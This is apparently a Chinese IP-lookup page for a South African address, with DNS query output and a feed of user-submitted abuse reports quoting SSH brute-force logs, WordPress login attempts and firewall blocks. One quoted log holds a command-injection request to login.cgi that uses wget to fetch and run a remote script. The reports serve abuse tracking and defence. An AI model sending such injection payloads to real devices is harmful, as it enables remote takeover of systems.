168.142.226.185

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): South Africa

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 168.142.226.185
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 30777
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;168.142.226.185.		IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025013001 1800 900 604800 86400

;; Query time: 13 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Jan 31 13:16:43 CST 2025
;; MSG SIZE  rcvd: 108

HOST信息:

Host 185.226.142.168.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 185.226.142.168.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
222.186.173.238	attack	Dec 23 13:40:21 sd-53420 sshd\[30416\]: User root from 222.186.173.238 not allowed because none of user's groups are listed in AllowGroups Dec 23 13:40:22 sd-53420 sshd\[30416\]: Failed none for invalid user root from 222.186.173.238 port 23416 ssh2 Dec 23 13:40:22 sd-53420 sshd\[30416\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.173.238 user=root Dec 23 13:40:24 sd-53420 sshd\[30416\]: Failed password for invalid user root from 222.186.173.238 port 23416 ssh2 Dec 23 13:40:28 sd-53420 sshd\[30416\]: Failed password for invalid user root from 222.186.173.238 port 23416 ssh2 ...	2019-12-23 20:46:58
206.189.153.181	attackbots	Dec 23 02:25:48 wildwolf wplogin[3670]: 206.189.153.181 informnapalm.org [2019-12-23 02:25:48+0000] "POST /wp/wp-login.php HTTP/1.1" "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "" "123321" Dec 23 02:25:49 wildwolf wplogin[1815]: 206.189.153.181 informnapalm.org [2019-12-23 02:25:49+0000] "POST /wp/xmlrpc.php HTTP/1.1" "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "admin" "" Dec 23 02:42:57 wildwolf wplogin[7618]: 206.189.153.181 informnapalm.org [2019-12-23 02:42:57+0000] "POST /blog/wp-login.php HTTP/1.1" "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "roman" "q1w2e3r4" Dec 23 02:43:00 wildwolf wplogin[9335]: 206.189.153.181 informnapalm.org [2019-12-23 02:43:00+0000] "POST /blog/wp-login.php HTTP/1.1" "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "irina" "" Dec 23 02:43:07 wildwolf wplogin[8011]: 206.189.153.181 informnapa........ ------------------------------	2019-12-23 20:26:29
108.46.78.101	attack	Dec 23 07:25:06 h2177944 kernel: \[281083.777689\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=108.46.78.101 DST=85.214.117.9 LEN=48 TOS=0x00 PREC=0x00 TTL=51 ID=3079 DF PROTO=TCP SPT=53780 DPT=8080 WINDOW=14600 RES=0x00 SYN URGP=0 Dec 23 07:25:06 h2177944 kernel: \[281083.777705\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=108.46.78.101 DST=85.214.117.9 LEN=48 TOS=0x00 PREC=0x00 TTL=51 ID=3079 DF PROTO=TCP SPT=53780 DPT=8080 WINDOW=14600 RES=0x00 SYN URGP=0 Dec 23 07:25:07 h2177944 kernel: \[281084.762099\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=108.46.78.101 DST=85.214.117.9 LEN=48 TOS=0x00 PREC=0x00 TTL=51 ID=3080 DF PROTO=TCP SPT=53780 DPT=8080 WINDOW=14600 RES=0x00 SYN URGP=0 Dec 23 07:25:07 h2177944 kernel: \[281084.762115\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=108.46.78.101 DST=85.214.117.9 LEN=48 TOS=0x00 PREC=0x00 TTL=51 ID=3080 DF PROTO=TCP SPT=53780 DPT=8080 WINDOW=14600 RES=0x00 SYN URGP=0 Dec 23 07:25:09 h2177944 kernel: \[281086.760424\] \[UFW BLOCK\] IN=venet0 OUT= MAC= SRC=108.46.78.101 DST=85.214.11	2019-12-23 20:51:16
220.130.222.156	attackbots	$f2bV_matches	2019-12-23 20:38:27
103.248.146.9	attack	1577082323 - 12/23/2019 07:25:23 Host: 103.248.146.9/103.248.146.9 Port: 445 TCP Blocked	2019-12-23 20:33:29
185.22.175.132	attack	fake user registration/login attempts	2019-12-23 20:36:32
78.110.153.198	attackspambots	Automatic report - Port Scan Attack	2019-12-23 20:25:48
177.8.244.38	attackspam	[Aegis] @ 2019-12-23 10:55:46 0000 -> Attempted Administrator Privilege Gain: ET SCAN LibSSH Based Frequent SSH Connections Likely BruteForce Attack	2019-12-23 20:48:45
92.63.194.148	attackspam	firewall-block, port(s): 22414/tcp, 22651/tcp, 22653/tcp	2019-12-23 20:34:03
94.23.218.74	attackbots	Dec 23 13:10:34 srv01 sshd[24208]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.23.218.74 user=root Dec 23 13:10:35 srv01 sshd[24208]: Failed password for root from 94.23.218.74 port 42244 ssh2 Dec 23 13:15:08 srv01 sshd[24550]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.23.218.74 user=root Dec 23 13:15:11 srv01 sshd[24550]: Failed password for root from 94.23.218.74 port 43846 ssh2 Dec 23 13:19:47 srv01 sshd[24844]: Invalid user chivas from 94.23.218.74 port 45364 ...	2019-12-23 20:28:03
156.219.115.49	attack	1 attack on wget probes like: 156.219.115.49 - - [22/Dec/2019:04:17:07 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 20:35:41
138.197.21.218	attackspam	Dec 23 07:36:36 legacy sshd[3937]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.197.21.218 Dec 23 07:36:38 legacy sshd[3937]: Failed password for invalid user 01234567 from 138.197.21.218 port 38310 ssh2 Dec 23 07:42:19 legacy sshd[4187]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.197.21.218 ...	2019-12-23 20:25:00
148.70.183.43	attackspambots	Invalid user info from 148.70.183.43 port 43197	2019-12-23 20:59:55
210.202.85.226	attack	12/23/2019-04:39:45.048267 210.202.85.226 Protocol: 6 ET SCAN Suspicious inbound to MSSQL port 1433	2019-12-23 20:43:31
124.165.247.133	attack	Dec 23 06:30:43 risk sshd[1270]: Address 124.165.247.133 maps to 133.247.165.124.adsl-pool.sx.cn, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT! Dec 23 06:30:43 risk sshd[1270]: Invalid user weblogic from 124.165.247.133 Dec 23 06:30:43 risk sshd[1270]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=124.165.247.133 Dec 23 06:30:45 risk sshd[1270]: Failed password for invalid user weblogic from 124.165.247.133 port 39333 ssh2 Dec 23 07:13:22 risk sshd[2077]: Address 124.165.247.133 maps to 133.247.165.124.adsl-pool.sx.cn, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT! Dec 23 07:13:22 risk sshd[2077]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=124.165.247.133 user=nobody Dec 23 07:13:25 risk sshd[2077]: Failed password for nobody from 124.165.247.133 port 53292 ssh2 Dec 23 07:17:14 risk sshd[2142]: Address 124.165.247.133 maps to 133.247......... -------------------------------	2019-12-23 20:37:30

最近上报的IP列表

135.103.187.145	5.50.229.227	46.146.50.236	206.53.215.1
221.221.154.154	12.65.198.87	223.135.238.68	132.120.68.56
145.68.223.69	142.25.101.13	36.183.119.129	62.201.254.16
90.134.112.183	184.222.44.73	19.107.114.13	27.206.166.171
107.11.109.67	225.33.249.104	36.251.82.55	30.125.245.25